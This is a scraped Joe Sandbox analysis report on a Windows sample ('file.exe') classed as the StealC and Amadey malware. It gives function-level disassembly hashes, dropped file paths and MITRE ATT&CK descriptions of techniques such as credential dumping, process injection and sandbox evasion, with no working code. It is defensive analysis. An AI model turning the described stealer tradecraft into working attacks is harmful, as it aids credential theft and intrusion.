Source File: 00000000.00000002.2754669291.000000006C951000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C950000, based on PE: true

Associated: 00000000.00000002.2754555334.000000006C950000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754870260.000000006C9CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754942771.000000006C9DE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754995972.000000006C9E2000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c950000_file.jbxd

Similarity

API ID: malloc$free
String ID:
API String ID: 1480856625-0
Opcode ID: 4a3fa7251f20dddc6a31a05e6545ba1e6e250dcf32023cc5abafa5e9dbd4eb59
Instruction ID: 1e6818b70d90afa943eacdccacf6a42aefc3ddc81936bb5cfd5fe10332e2ae08
Opcode Fuzzy Hash: 4a3fa7251f20dddc6a31a05e6545ba1e6e250dcf32023cc5abafa5e9dbd4eb59
Instruction Fuzzy Hash: 6E31E371A00217DFDB10CF58C88466BBBB9EF84324F168629C84AFB241DB31ED15CBA1

Function 6C98F5A0 Relevance: 5.1, APIs: 4, Instructions: 88COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,?,00010000), ref: 6C98F611
memcpy.VCRUNTIME140(?,?,?), ref: 6C98F623
memcpy.VCRUNTIME140(?,?,00010000), ref: 6C98F652
memcpy.VCRUNTIME140(?,?,?), ref: 6C98F668

Memory Dump Source

Source File: 00000000.00000002.2754669291.000000006C951000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C950000, based on PE: true

Associated: 00000000.00000002.2754555334.000000006C950000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754870260.000000006C9CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754942771.000000006C9DE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754995972.000000006C9E2000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c950000_file.jbxd

Similarity

API ID: memcpy
String ID:
API String ID: 3510742995-0
Opcode ID: cd72a4b24c16f126375525e6a79600fc7eb806012afa7aeaa1976f5403f08771
Instruction ID: e7f27f9f32ace74b3a6bba9ab02ad8230c30b8ed2a5ba9c71f665feb71d6b9ea
Opcode Fuzzy Hash: cd72a4b24c16f126375525e6a79600fc7eb806012afa7aeaa1976f5403f08771
Instruction Fuzzy Hash: 5B315E71B00214AFCB14CF19DCC0AAA7BB9EB94358B148938EA498BF04D631E9448B91

Function 6C9A26B0 Relevance: 5.0, APIs: 4, Instructions: 45COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C9A26C1
free.MOZGLUE(?), ref: 6C9A26E4
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C9A26FF
free.MOZGLUE ref: 6C9A270D

Memory Dump Source

Source File: 00000000.00000002.2754669291.000000006C951000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C950000, based on PE: true

Associated: 00000000.00000002.2754555334.000000006C950000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754870260.000000006C9CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754942771.000000006C9DE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754995972.000000006C9E2000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c950000_file.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 1264677abb0e2ab6cd0a034bc7a0299bdd433441f67f6c834f4097ed3b41bb67
Instruction ID: 808196dbb8c7bf08ebfe75096d6c216f8bfecdf6c4da0336bc457311e1ce8cce
Opcode Fuzzy Hash: 1264677abb0e2ab6cd0a034bc7a0299bdd433441f67f6c834f4097ed3b41bb67
Instruction Fuzzy Hash: 44F02DB27026016BEB109E59D88495B73ADFF5131CB200035EA1ED3B11E331F95AC6A2

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject malicious code into process via Extra Window Memory (EWM) in order to evade process-based defenses as well as possibly elevate privileges. EWM injection is a method of executing arbitrary code in the address space of a separate live process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Process: OS API Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: StealC

Threatname: Amadey

Yara Signatures

PCAP (Network Traffic)

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\BFHDAEHDAKECGCAKFCFIJDHJDB

C:\ProgramData\FHJDGHIJDGCBAAAAAFIJ

C:\ProgramData\HCAFIJDGHCBFHJKFCGIE

C:\ProgramData\HDAKFCGIJKJKFHIDHIII

C:\ProgramData\KFBAECBA

C:\ProgramData\KFBFCAFCBKFIEBFHIDBAKJJJJE

C:\ProgramData\KFCFBAAE

C:\ProgramData\freebl3.dll

Windows Analysis Report
file.exe

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may use legitimate desktop support and remote access software to establish an interactive command and control channel to target systems within networks. These services, such as `VNC`, `Team Viewer`, `AnyDesk`, `ScreenConnect`, `LogMein`, `AmmyyAdmin`, and other remote monitoring and management (RMM) tools, are commonly used as legitimate technical support software and may be allowed by application control within a target environment.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre